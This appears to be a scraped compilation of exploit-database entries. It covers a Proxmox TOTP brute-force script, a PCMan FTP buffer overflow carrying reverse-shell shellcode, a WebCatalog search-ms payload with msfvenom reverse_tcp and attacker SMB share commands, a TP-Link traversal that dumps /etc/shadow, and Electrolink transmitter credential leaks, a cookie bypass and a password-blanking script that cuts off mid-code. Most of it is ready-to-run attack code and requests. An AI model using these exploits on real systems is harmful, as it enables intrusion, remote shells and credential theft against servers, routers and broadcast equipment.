ISHACK AI BOT

# Exploit Title: Proxmox VE TOTP Brute Force # Date: 09/23/2023 # Exploit Author: Cory Cline, Gabe Rust # Vendor Homepage: https://www.proxmox.com/en/ # Software Link: http://download.proxmox.com/iso/ # Version: 5.4 - 7.4-1 # Tested on: Debian # CVE : CVE-2023-43320 import time import requests import urllib.parse import json import os import urllib3 urllib3.disable_warnings() threads=25 #################### REPLACE THESE VALUES ######################### password="KNOWN PASSWORD HERE" username="KNOWN USERNAME HERE" target_url="https://HOST:PORT" ################################################################## ticket="" ticket_username="" CSRFPreventionToken="" ticket_data={} auto_refresh_time = 20 # in minutes - 30 minutes before expiration last_refresh_time = 0 tokens = []; for num in range(0,1000000): tokens.append(str(num).zfill(6)) def refresh_ticket(target_url, username, password): global CSRFPreventionToken global ticket_username global ticket_data refresh_ticket_url = target_url + "/api2/extjs/access/ticket" refresh_ticket_cookies = {} refresh_ticket_headers = {} refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"} ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text) ticket_data = json.loads(ticket_data_raw) CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"] ticket_username = ticket_data["data"]["username"] def attack(token): global last_refresh_time global auto_refresh_time global target_url global username global password global ticket_username global ticket_data if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) url = target_url + "/api2/extjs/access/ticket" cookies = {} headers = {"Csrfpreventiontoken": CSRFPreventionToken} stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1] stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A') data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)} response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False) if(len(response.text) > 350): print(response.text) os._exit(1) while(1): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: res = [executor.submit(attack, token) for token in tokens] concurrent.futures.wait(res)

# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities # Date: 25/9/2023 # Exploit Author: Syed Affan Ahmed (ZEROXINN) # Vendor Homepage: https://www.embedthis.com/goahead/ # Affected Version: 2.5 may be others. # Tested On Version: 2.5 in ZTE AC3630 ---------------------------POC--------------------------- GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation. HTML Injection can cause the ability to execute within the context of that site. http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>

RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC Vendor: Royal Apps GmbH Web page: https://www.royalapps.com Affected version: 6.0.1.1000 (macOS) Summary: Royal TS is an ideal tool for system engineers and other IT professionals who need remote access to systems with different protocols. Not only easy to use, it enables secure multi-user document sharing. Desc: The application receives SIGABRT after RAPortCheck.createNWConnection() function is handling the SecureGatewayHost object in the RoyalTSXNativeUI. When the hostname has an array of around 1600 bytes and Test Connection is clicked the app crashes instantly. Tested on: MacOS 13.5.1 (Ventura) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5788 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php 05.09.2023 -- ------------------------------------- Translated Report (Full Report Below) ------------------------------------- Process: RoyalTSX [23807] Path: /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX Identifier: com.lemonmojo.RoyalTSX.App Version: 6.0.1 (6.0.1.1000) Code Type: X86-64 (Native) Parent Process: launchd [1] User ID: 503 Date/Time: 2023-09-05 16:09:46.6361 +0200 OS Version: macOS 13.5.1 (22G90) Report Version: 12 Bridge OS Version: 7.6 (20P6072) Time Awake Since Boot: 21000 seconds Time Since Wake: 1106 seconds System Integrity Protection: enabled Crashed Thread: 0 tid_103 Dispatch queue: com.apple.main-thread Exception Type: EXC_BAD_ACCESS (SIGABRT) Exception Codes: KERN_INVALID_ADDRESS at 0x0000000000000050 Exception Codes: 0x0000000000000001, 0x0000000000000050 Termination Reason: Namespace SIGNAL, Code 6 Abort trap: 6 Terminating Process: RoyalTSX [23807] VM Region Info: 0x50 is not in any region. Bytes before following region: 140737488273328 REGION TYPE START - END [ VSIZE] PRT/MAX SHRMOD REGION DETAIL UNUSED SPACE AT START ---> shared memory 7ffffffec000-7ffffffed000 [ 4K] r-x/r-x SM=SHM Application Specific Information: abort() called Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x7ff809ef7202 __pthread_kill + 10 1 libsystem_pthread.dylib 0x7ff809f2eee6 pthread_kill + 263 2 libsystem_c.dylib 0x7ff809e55b45 abort + 123 3 libmonosgen-2.0.1.dylib 0x1028daa1b altstack_handle_and_restore + 235 4 libmonosgen-2.0.1.dylib 0x102879db6 summarize_frame_internal + 310 5 libmonosgen-2.0.1.dylib 0x102879f66 summarize_frame + 198 6 libmonosgen-2.0.1.dylib 0x10287578f mono_walk_stack_full + 1135 7 libmonosgen-2.0.1.dylib 0x102873944 mono_summarize_managed_stack + 100 8 libmonosgen-2.0.1.dylib 0x102a0f478 mono_threads_summarize_execute_internal + 1256 9 libmonosgen-2.0.1.dylib 0x102a0f8aa mono_threads_summarize + 346 10 libmonosgen-2.0.1.dylib 0x1028e0b67 mono_dump_native_crash_info + 855 11 libmonosgen-2.0.1.dylib 0x10287864e mono_handle_native_crash + 318 12 libmonosgen-2.0.1.dylib 0x1027d1966 mono_crashing_signal_handler + 86 13 libsystem_platform.dylib 0x7ff809f5c5ed _sigtramp + 29 14 ??? 0x101e9502c ??? 15 RoyalTSXNativeUI 0x109e50012 RAPortCheck.createNWConnection() + 290 16 RoyalTSXNativeUI 0x109e4f6d2 RAPortCheck.connect() + 242 17 RoyalTSXNativeUI 0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592 18 RoyalTSXNativeUI 0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359 19 RoyalTSXNativeUI 0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51 20 AppKit 0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323 21 AppKit 0x7ff80d2972b0 -[NSControl sendAction:to:] + 86 22 AppKit 0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131 23 AppKit 0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171 24 AppKit 0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96 25 AppKit 0x7ff80d293ee5 NSControlTrackMouse + 1816 26 AppKit 0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121 27 AppKit 0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606 28 AppKit 0x7ff80d292ac0 -[NSControl mouseDown:] + 659 29 AppKit 0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330 30 AppKit 0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404 31 AppKit 0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345 32 AppKit 0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345 33 AppKit 0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360 34 AppKit 0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69 35 AppKit 0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78 36 AppKit 0x7ff80d33f773 _NSTryRunModal + 100 37 AppKit 0x7ff80d4c20be -[NSApplication runModalSession:] + 128 38 RoyalTSXNativeUI 0x109f17044 RAPropertiesWindowController._showModal() + 628 39 RoyalTSXNativeUI 0x109f17548 @objc RAPropertiesWindowController._showModal() + 24 40 Foundation 0x7ff80ae84951 -[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379 41 Foundation 0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124 42 libffi.dylib 0x7ff81a5fd8c2 ffi_call_unix64 + 82 43 libffi.dylib 0x7ff81a5fd214 ffi_call_int + 830 Thread 0 crashed with X86 Thread State (64-bit): rax: 0x0000000000000000 rbx: 0x00007ff84d608700 rcx: 0x00007ff7be10fbc8 rdx: 0x0000000000000000 rdi: 0x0000000000000103 rsi: 0x0000000000000006 rbp: 0x00007ff7be10fbf0 rsp: 0x00007ff7be10fbc8 r8: 0x0000000000000212 r9: 0x00007fafaeaf64a8 r10: 0x0000000000000000 r11: 0x0000000000000246 r12: 0x0000000000000103 r13: 0x00007ff7be110418 r14: 0x0000000000000006 r15: 0x0000000000000016 rip: 0x00007ff809ef7202 rfl: 0x0000000000000246 cr2: 0x00007ff84d611068 Logical CPU: 0 Error Code: 0x02000148 Trap Number: 133 Thread 0 instruction stream: 0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d ..$...I.y.L.E..M d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3 .H.U.M...]y..H.. 4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07 K.|>.H.s0....... 7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0 .%.L.E.H.CXK..>. 00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00 ...A.D$.C..>.... 48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60 H.C8K..>....H.C` [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89 .@PC..>.....C@C. <== 84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00 .>....H.E.C..>.. 00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48 ...E.C..>......H 8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90 ....&......C..>. 00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83 .......I.E.H..A. 38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14 8.t$K.|>.M...i.. Binary Images: 0x101deb000 - 0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX ... ...

# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution # Date: 9/27/2023 # Exploit Author: ItsSixtyN3in # Vendor Homepage: https://webcatalog.io/en/ # Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe # Version: 48.4.0 # Tested on: Windows # CVE : CVE-2023-42222 Vulnerability summary: WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery. Exploit details: - Create a reverse shell file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe - Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py) python3 smbserver.py Tools -smb2support - Have the user sync a page with the payload as a renamed link [Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title) Payload: search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title Tobias Diehl Security Consultant OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300 Pronouns: he/him e-mail: [email protected]

# Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow # Date: 09/25/2023 # Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0 # Tested on: Windows XP SP3 #!/usr/bin/python import socket #buffer = 'A' * 2500 #offset = 2007 #badchars=\x00\x0a\x0d #return_address=0x7e429353 (USER32.dll) #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d" #nc -nvlp 4444 overflow = ( "\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9" "\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d" "\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f" "\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53" "\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55" "\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1" "\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52" "\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6" "\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37" "\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf" "\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3" "\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4" "\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75" "\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7" "\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e" "\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17" "\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd" "\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94" "\xd7") shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow # Change IP/Port as required s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer..." s.connect(('192.168.146.135',21)) data = s.recv(1024) s.send('USER anonymous' +'\r\n') data = s.recv(1024) s.send('PASS anonymous\r\n') s.send('pwd ' + shellcode + '\r\n') s.close() print "\nExploit completed successfully!." except: print "Could not connect to FTP!"

# Exploit Title: TP-Link TL-WR740N UnAuthenticated Directory Transversal # Date: 25/9/2023 # Exploit Author: Syed Affan Ahmed (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: TP-Link TL-WR740N ---------------------------POC--------------------------- Request ------- GET /help/../../../etc/shadow HTTP/1.1 Host: 192.168.0.1:8082 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ipaddr=192.168.0.100; mLangage=Âée; exception=4 Connection: close Response -------- HTTP/1.1 200 OK Server: Router Webserver Connection: close WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N" Content-Type: text/html <META http-equiv=Content-Type content="text/html; charset=iso-8859-1"> <HTML> <HEAD><TITLE>TL-WR740N</TITLE> <META http-equiv=Pragma content=no-cache> <META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"> <LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"> <SCRIPT language="javascript" type="text/javascript"><!-- if(window.parent == window){window.location.href="http://192.168.0.1";} function Click(){ return false;} document.oncontextmenu=Click; function doPrev(){history.go(-1);} //--></SCRIPT> root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7::: bin::10933:0:99999:7::: daemon::10933:0:99999:7::: adm::10933:0:99999:7::: lp:*:10933:0:99999:7::: sync:*:10933:0:99999:7::: shutdown:*:10933:0:99999:7::: halt:*:10933:0:99999:7::: uucp:*:10933:0:99999:7::: operator:*:10933:0:99999:7::: nobody::10933:0:99999:7::: ap71::10933:0:99999:7:::

# Exploit Title: TP-LINK TL-WR740N - Multiple HTML Injection Vulnerabilities # Date: 25/9/2023 # Exploit Author: Shujaat Amin (ZEROXINN) # Vendor Homepage: http://www.tp-link.com # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n # Tested on: Windows 10 ---------------------------POC----------------------------- 1) Go to your routers IP (192.168.0.1) 2) Go to Access control --> Target,rule 3) Click on add new 5) Type <h1>Hello<h1> in Target Description box 6) Click on Save, and now you can see html injection on the webpage

Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in login.htm and mail.htm that can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-XXXX Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-xxxx.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/login.htm" | findstr /spina:d "passw" 55:<td class=cd31>Admin password</td> 56:<td class=cd32><input type=password name=adminpassword value="cozzir" tabindex=2 style="width: 95%" maxlength="30"/></td> 63:<td class=cd31>Guest password</td> 64:<td class=cd32><input type=password name=guestpassword value="guest" tabindex=4 style="width: 95%" maxlength="30"/></td> C:\>curl -s http://192.168.150.77:8888/mail.htm | findstr /spina:d "passw" 93:<td class=cd31>Server password</td> 94:<td class=cd32><input type=password name=password value="t00tw00t" tabindex=4 style="width: 95%" maxlength="40"/></td>

Electrolink FM/DAB/TV Transmitter (controlloLogin.js) Credentials Disclosure Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The device is vulnerable to a disclosure of clear-text credentials in controlloLogin.js that can allow security bypass and system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5790 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5790.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/controlloLogin.js" function verifica() { var user = document.getElementById('user').value; var password = document.getElementById('password').value; //alert(user); if(user=='admin' && password=='cozzir'){ SetCookie('Login','OK',exp); window.location.replace("FrameSetCore.html"); }else{ SetCookie('Login','NO',exp); window.location.replace("login.html"); } }

Electrolink FM/DAB/TV Transmitter (Login Cookie) Authentication Bypass Vendor: Electrolink s.r.l. Product web page: https://www.electrolink.com Affected version: 10W, 100W, 250W, Compact DAB Transmitter 500W, 1kW, 2kW Medium DAB Transmitter 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter 100W, 500W, 1kW, 2kW Compact FM Transmitter 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter 15W - 40kW Digital FM Transmitter BI, BIII VHF TV Transmitter 10W - 5kW UHF TV Transmitter Web version: 01.09, 01.08, 01.07 Display version: 1.4, 1.2 Control unit version: 01.06, 01.04, 01.03 Firmware version: 2.1 Summary: Since 1990 Electrolink has been dealing with design and manufacturing of advanced technologies for radio and television broadcasting. The most comprehensive products range includes: FM Transmitters, DAB Transmitters, TV Transmitters for analogue and digital multistandard operation, Bandpass Filters (FM, DAB, ATV, DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial switches, Manual patch panels, RF power meters, Rigid line and accessories. A professional solution that meets broadcasters needs from small community television or radio to big government networks. Compact DAB Transmitters 10W, 100W and 250W models with 3.5" touch-screen display and in-built state of the art DAB modulator, EDI input and GPS receiver. All transmitters are equipped with a state-of-the art DAB modulator with excellent performances, self-protected and self-controlled amplifiers ensure trouble-free non-stop operation. 100W, 500W, 1kW and 2kW power range available on compact 2U and 3U 19" frame. Built-in stereo coder, touch screen display and efficient low noise air cooling system. Available models: 3kW, 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters with fully broadband solid state amplifiers and an efficient low-noise air cooling system. FM digital modulator with excellent specifications, built-in stereo and RDS coder. Digital deviation limiter together with ASI and SDI inputs are available. These transmitters are ready for ISOFREQUENCY networks. Available for VHF BI and VHF BIII operation with robust desing and user-friendly local and remote control. Multi-standard UHF TV transmitters from 10W up to 5kW with efficient low noise air cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC and ISDB-Tb available. Desc: The transmitter is vulnerable to an authentication bypass vulnerability affecting the Login Cookie. An attacker can set an arbitrary value except 'NO' to the Login Cookie and have full system access. Tested on: Mbedthis-Appweb/12.5.0 Mbedthis-Appweb/12.0.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research & Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2023-5791 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5791.php 30.06.2023 -- C:\>curl -s "http://192.168.150.77:8888/home.htm" -H "Cookie: Login=ADMIN"

#!/usr/bin/env python # # # Electrolink FM/DAB/TV Transmitter Remote Authentication Removal # # # Vendor: Electrolink s.r.l. # Product web page: https://www.electrolink.com # Affected version: 10W, 100W, 250W, Compact DAB Transmitter # 500W, 1kW, 2kW Medium DAB Transmitter # 2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter # 100W, 500W, 1kW, 2kW Compact FM Transmitter # 3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter # 15W - 40kW Digital FM Transmitter # BI, BIII VHF TV Transmitter # 10W - 5kW UHF TV Transmitter # Web version: 01.09, 01.08, 01.07 # Display version: 1.4, 1.2 # Control unit version: 01.06, 01.04, 01.03 # Firmware version: 2.1 # # Summary: Since 1990 Electrolink has been dealing with design and # manufacturing of advanced technologies for radio and television # broadcasting. The most comprehensive products range includes: FM # Transmitters, DAB Transmitters, TV Transmitters for analogue and # digital multistandard operation, Bandpass Filters (FM, DAB, ATV, # DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial # switches, Manual patch panels, RF power meters, Rigid line and # accessories. A professional solution that meets broadcasters needs # from small community television or radio to big government networks. # # Compact DAB Transmitters 10W, 100W and 250W models with 3.5" # touch-screen display and in-built state of the art DAB modulator, # EDI input and GPS receiver. All transmitters are equipped with a # state-of-the art DAB modulator with excellent performances, # self-protected and self-controlled amplifiers ensure trouble-free # non-stop operation. # # 100W, 500W, 1kW and 2kW power range available on compact 2U and # 3U 19" frame. Built-in stereo coder, touch screen display and # efficient low noise air cooling system. Available models: 3kW, # 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters # with fully broadband solid state amplifiers and an efficient # low-noise air cooling system. # # FM digital modulator with excellent specifications, built-in # stereo and RDS coder. Digital deviation limiter together with # ASI and SDI inputs are available. These transmitters are ready # for ISOFREQUENCY networks. # # Available for VHF BI and VHF BIII operation with robust desing # and user-friendly local and remote control. Multi-standard UHF # TV transmitters from 10W up to 5kW with efficient low noise air # cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC # and ISDB-Tb available. # # Desc: The application is vulnerable to an unauthenticated # parameter manipulation that allows an attacker to set the # credentials to blank giving her access to the admin panel. # Also vulnerable to account takeover and arbitrary password # change. # # Tested on: Mbedthis-Appweb/12.5.0 # Mbedthis-Appweb/12.0.0 # # # Vulnerability discovered by Neurogenesia # Macedonian Information Security Research & Development Laboratory # Zero Science Lab - https://www.zeroscience.mk - @zeroscience # # # Advisory ID: ZSL-2023-5792 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php # # # 30.06.2023 # # import datetime import requests dt = datetime.datetime.now() dt = dt.strftime('%d.%m.%Y %H:%M:%S') nul = '' print('Starting transmitter exploit at', dt) ip = input('Enter transmitter ip: ') if 'http' not in ip: ip = 'http://' + ip ep = '/login.htm' url = ip + ep signature = {'Accept-Encoding' : 'gzip, deflate', 'Accept-Language' : 'ku-MK,en;q=0.1806', 'User-Agent' : 'Broadcastso/B.B', 'Connection' : 'keep-alive' } # ----------------- Line breaker v0.17 ----------------- postd = { 'adminuser' : nul, 'guestuser' : nul, 'adminpassword' : nul, 'guestpassword' : nul 